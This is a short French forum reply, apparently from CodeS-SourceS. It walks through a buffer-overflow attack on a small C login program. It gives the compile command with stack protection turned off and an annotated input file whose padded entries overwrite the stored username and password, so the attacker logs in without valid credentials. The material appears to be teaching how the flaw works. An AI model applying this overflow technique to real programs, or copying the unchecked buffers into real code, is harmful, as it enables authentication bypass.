Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre questiongcc -W -Wall -ansi -pedantic titi.c -fno-stack-protector && ./a.out < toto.txt
Nom: Mot de passe: Nom: Mot de passe: Nom: Mot de passe: Bienvenu sur ce systeme...
osef
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxpass
plop
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxhack
hack
pass
osef <= On précise un nom bidon, j'aurais pu mettre n'importe quoi <= 20 char
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxpass <= On bourre de 52 char pour écraser user[0][1] (32 char pour atteindre user + 20 char pour atteindre pass).
plop <= On précise un nom bidon, j'aurais pu mettre n'importe quoi <= 20 char
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxhack <= Cette fois on écrase le "user", en bourrant de 20 char suivi de ce que l'on veut.
hack <= Cette fois on donne notre user que l'on a trafiqué
pass <= puis le pass que l'on a trafiqué
<= Ça "matchera" forcément et on entrera sans y avoir été invité, c'est bien hack par buffer overfow :)
Améliorer votre expérience CodeS-SourceS avec ce plugin:
http://codes-sources.commentcamarche.net/forum/affich-10000111-plugin-better-cs-2#cptpingu-signature